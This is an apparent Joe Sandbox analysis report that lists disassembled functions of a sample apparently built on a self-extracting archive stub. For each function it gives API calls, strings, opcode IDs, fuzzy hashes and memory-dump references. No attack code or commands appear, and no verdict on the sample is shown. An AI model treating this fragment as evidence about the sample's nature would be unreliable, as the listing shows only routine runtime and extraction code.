Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 144ea5c16bebd88ae78108d0a81a7b044f6c2b87a61685c7067919f25807baa6
Instruction ID: 1ef85175ed1b17d20c5d3c8071dfa4b193d3da22e301bb06b738635b6135c0cf
Opcode Fuzzy Hash: 144ea5c16bebd88ae78108d0a81a7b044f6c2b87a61685c7067919f25807baa6
Instruction Fuzzy Hash: 3A11B132244200AFDB259F689C4DF6A37B9FB8A745F144001F209DA1B8C7B2D901DB2B

Function 0086D1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 0086D22E
_strncpy.LIBCMT ref: 0086D278

Strings

$%s, xrefs: 0086D223
@%s, xrefs: 0086D218

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: __fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 1857242416-834177443
Opcode ID: 8a8835ac842fe3dd6c0b23885fcec6e438549c5b998c83e6d2f4894b913c9c42
Instruction ID: 613a019c1ccbee540b2a4a05d0475fbd94b839411db9956dfbf52568e1ef0daf
Opcode Fuzzy Hash: 8a8835ac842fe3dd6c0b23885fcec6e438549c5b998c83e6d2f4894b913c9c42
Instruction Fuzzy Hash: DB216F72A4034CABDF20EEA8CC06FEA7BA8FF05300F054512FE14D6292D771EA559B51

Function 0087A990 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 0086130B: GetDlgItem.USER32(00000000,00003021), ref: 0086134F
Part of subcall function 0086130B: SetWindowTextW.USER32(00000000,008935B4), ref: 00861365

EndDialog.USER32(?,00000001), ref: 0087A9DE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0087A9F6
SetDlgItemTextW.USER32(?,00000067,?), ref: 0087AA24

Strings

GETPASSWORD1, xrefs: 0087A9A9

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: a5eb4471838640dbf2363c18bcf81516eb8e9c09a37fe701a884dad1126bf8ac
Instruction ID: 3637a42e09c08e04da78b99e6fb1c9151901a5beb49627089766f3a474bf5228
Opcode Fuzzy Hash: a5eb4471838640dbf2363c18bcf81516eb8e9c09a37fe701a884dad1126bf8ac
Instruction Fuzzy Hash: 5A114833944128BADB259A689D09FFE7B3CFB89710F014011FB49F21D5C271D9A1D762

Function 0086B4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0086B51E

Part of subcall function 0086400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0086401D

_wcschr.LIBVCRUNTIME ref: 0086B53C
_wcschr.LIBVCRUNTIME ref: 0086B54C

Strings

%c:\, xrefs: 0086B514

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: a2f296de3445da559b8d9943c10055cb638c405c0a72b5aa3da14eca7cff2551
Instruction ID: edf06b28f2d4292139d0706ab06c9974d7dbbf33b830075180d876b849318f01
Opcode Fuzzy Hash: a2f296de3445da559b8d9943c10055cb638c405c0a72b5aa3da14eca7cff2551
Instruction Fuzzy Hash: 48012D53914311BACB207BB99C4BCABB7ACFF957A0B514426F946C7081FB30D980C3A2

Function 008706BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0086ABC5,00000008,?,00000000,?,0086CB88,?,00000000), ref: 008706F3
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0086ABC5,00000008,?,00000000,?,0086CB88,?,00000000), ref: 008706FD
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0086ABC5,00000008,?,00000000,?,0086CB88,?,00000000), ref: 0087070D

Strings

Thread pool initialization failed., xrefs: 00870725

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 480073ed7f9d54a6165707d31087dc47fac6590228ae229063c16d1405492a4b
Instruction ID: 26a42e1e40471b66dda9cf9db1d99ab426317baf4dd5f3c8dda10a74169bff88
Opcode Fuzzy Hash: 480073ed7f9d54a6165707d31087dc47fac6590228ae229063c16d1405492a4b
Instruction Fuzzy Hash: 101151B1504708AFD3315FA59C84AA7FBECFB95755F10482EF1DAC6200D671A980CF50

Function 0087D38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 0087D3C9, 0087D3FD
RENAMEDLG, xrefs: 0087D3DE

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 49b12e0bfdf9c26713d9eefa443c4be27a4a200a1080c1586db9477263df6c9a
Instruction ID: 1d5928f60e61fcf9fe3c92a92c6abe5b8533c42a4ed570262a5002c2bbd2ddfe
Opcode Fuzzy Hash: 49b12e0bfdf9c26713d9eefa443c4be27a4a200a1080c1586db9477263df6c9a
Instruction Fuzzy Hash: 9A019E71A00349AFEB119F54EC04E563FB9FB09384B048421F909D2771EA76DC50EBA5

Function 0087D287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0087D29D
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0087D2D9

Strings

sfxcmd, xrefs: 0087D298
sfxpar, xrefs: 0087D2D4

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 5c4c25e649073e37a08c154259ea24a60ced0ff56701cda503f7a9402e3177fe
Instruction ID: 60c63b9a2cfeb3dc052f0321cfd353fa7db44d5faaa6fbe89c863d8b7dad8d8b
Opcode Fuzzy Hash: 5c4c25e649073e37a08c154259ea24a60ced0ff56701cda503f7a9402e3177fe
Instruction Fuzzy Hash: F6F02771811228A3CB203F949C09ABA7768FF09741B044012FD4CD6206D660DC41D7F1

Function 008891DE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00889269
__alldvrm.LIBCMT ref: 0088946A
__alldvrm.LIBCMT ref: 0088948C

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
Instruction ID: c424d3564c08bbd6e2dd9bf29e81536f0bf38b24ca28853a9ca0b0e2b80dfc47
Opcode Fuzzy Hash: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
Instruction Fuzzy Hash: 2EA14571A003869FDB21EE68C8817BEBBA5FF55314F1C41ADE4D9DB382C2389942C755

Function 0086A2AB Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,008680B7,?,?,?), ref: 0086A351
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,008680B7,?,?), ref: 0086A395
SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,008680B7,?,?,?,?,?,?,?,?), ref: 0086A416
CloseHandle.KERNEL32(?,?,00000000,?,008680B7,?,?,?,?,?,?,?,?,?,?,?), ref: 0086A41D

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: fea6316e0e26c756be81472afdb1d807cdd7d419257f15aa9ee389706c2eb4ae
Instruction ID: 1ded3e8a41a3c577e39f8dbfd00e80aecf91ff45a6baa8ae603a88b3d2cd3121
Opcode Fuzzy Hash: fea6316e0e26c756be81472afdb1d807cdd7d419257f15aa9ee389706c2eb4ae
Instruction Fuzzy Hash: F641CE30288384AAD725DF64DC55BABBBE4FB85700F04091DB5D1E3281D6649A489B53

Function 0088C099 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,008889AD,?,00000000,?,00000001,?,?,00000001,008889AD,?), ref: 0088C0E6
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0088C16F
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,008867E2,?), ref: 0088C181
__freea.LIBCMT ref: 0088C18A

Part of subcall function 00888518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0088C13D,00000000,?,008867E2,?,00000008,?,008889AD,?,?,?), ref: 0088854A

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: e7c3112af86cc4bbe076317e95e0809c359cc6996351c708a63aa7cc1b66e5ee
Instruction ID: 2761be15daa71386cc1d5a445ea5280a71e5956c55af4b31f8ceb9bba04f148d
Opcode Fuzzy Hash: e7c3112af86cc4bbe076317e95e0809c359cc6996351c708a63aa7cc1b66e5ee
Instruction Fuzzy Hash: 1A31DE76A0020AABDF25AF79DC89DAE7BA5FB44710F084129FC05D7255EB35CD50CBA0

Function 00882503 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0088251A

Part of subcall function 00882B52: ___AdjustPointer.LIBCMT ref: 00882B9C

_UnwindNestedFrames.LIBCMT ref: 00882531
___FrameUnwindToState.LIBVCRUNTIME ref: 00882543
CallCatchBlock.LIBVCRUNTIME ref: 00882567

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction ID: c697f7e7c2fcc54edea033d42779b5117f61100e5e80b7f66241099dfd9dd59e
Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction Fuzzy Hash: 0C014C32000109BBCF12AF69CD01EDA3FBAFF58714F058015FD18A6121C336E961EBA1

Function 00879DBB Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00879DBE
GetDeviceCaps.GDI32(00000000,00000058), ref: 00879DCD
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00879DDB
ReleaseDC.USER32(00000000,00000000), ref: 00879DE9

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: b8daac26149a962bd281d4250f9eb8dcfce58f02648c65dc2363dd48528a42b7
Instruction ID: 9cb18b7e6dc772870508c9f5e57db9eeab4d02cb24209e516e27ff0fabc7e5d4
Opcode Fuzzy Hash: b8daac26149a962bd281d4250f9eb8dcfce58f02648c65dc2363dd48528a42b7
Instruction Fuzzy Hash: 6EE0EC31986A21A7D3201BA8AC0DF8B3F64BB0E712F050026F606961E4EA704405CBA8

Function 00882016 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00882016
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0088201B
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00882020

Part of subcall function 0088310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0088311F

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00882035

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
Instruction ID: bf57fe2d7823af41fb71681d436f80f6add5dd085f4106364a5f9e42dd9df854
Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
Instruction Fuzzy Hash: CFC04C38004A45D41C123AFE321A1BE2700FC62FC8BA220C2FC80D7103DE06070B9377

Function 00879F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00879DF1: GetDC.USER32(00000000), ref: 00879DF5
Part of subcall function 00879DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00879E00
Part of subcall function 00879DF1: ReleaseDC.USER32(00000000,00000000), ref: 00879E0B

GetObjectW.GDI32(?,00000018,?), ref: 00879F8D

Part of subcall function 0087A1E5: GetDC.USER32(00000000), ref: 0087A1EE
Part of subcall function 0087A1E5: GetObjectW.GDI32(?,00000018,?), ref: 0087A21D
Part of subcall function 0087A1E5: ReleaseDC.USER32(00000000,?), ref: 0087A2B5

Strings

(, xrefs: 0087A0A3

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 6ef2269735747d6c2d019ed8eb05d762938c91747009a8cb7020115806d44117
Instruction ID: 4695bf7d3b4048c9e3a10f66f4c90a1215cd7cb9fd2b7a569ac2e9e93c458997
Opcode Fuzzy Hash: 6ef2269735747d6c2d019ed8eb05d762938c91747009a8cb7020115806d44117
Instruction Fuzzy Hash: 9F810271208614AFD614DF68C84492ABBE9FFC8715F04891EF98AD7264DB31EE05CB62

Function 00870E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00870FF1

Strings

%s: %s, xrefs: 00871000
%ls, xrefs: 00870E76, 00870E8C

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: d5fd07b7e145744ecb60100b26d40e44921d0fb059894f5cc510fa7081e48891
Instruction ID: 64e2912f5888205fdc026dd7a279aaa4cfc543ee8eebdba060477db1f62f3427
Opcode Fuzzy Hash: d5fd07b7e145744ecb60100b26d40e44921d0fb059894f5cc510fa7081e48891
Instruction Fuzzy Hash: AA51A47224CB08FEEE202AE8CC46F367655F714B04F24C906F29EE48DDCA91D4507A13

Function 0088A918 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0088AA84

Part of subcall function 00888849: IsProcessorFeaturePresent.KERNEL32(00000017,00888838,00000050,00893958,?,0086CFE0,00000004,008A0EE8,?,?,00888845,00000000,00000000,00000000,00000000,00000000), ref: 0088884B
Part of subcall function 00888849: GetCurrentProcess.KERNEL32(C0000417,00893958,00000050,008A0EE8), ref: 0088886D
Part of subcall function 00888849: TerminateProcess.KERNEL32(00000000), ref: 00888874

Strings

., xrefs: 0088AC3B
*?, xrefs: 0088A95B

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
Instruction ID: 47ca8ebfea40d6216d6da8e5cc612828beef2986fd349c558e709d66c4cdbb6a
Opcode Fuzzy Hash: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
Instruction Fuzzy Hash: DF519375D0011A9FEF18EFA8C9819ADBBF5FF58310F25816AE454E7341E6319E01CB51

Function 0086772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00867730
SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008678CC

Part of subcall function 0086A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0086A27A,?,?,?,0086A113,?,00000001,00000000,?,?), ref: 0086A458
Part of subcall function 0086A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0086A27A,?,?,?,0086A113,?,00000001,00000000,?,?), ref: 0086A489

Strings

:, xrefs: 008677A1

Memory Dump Source

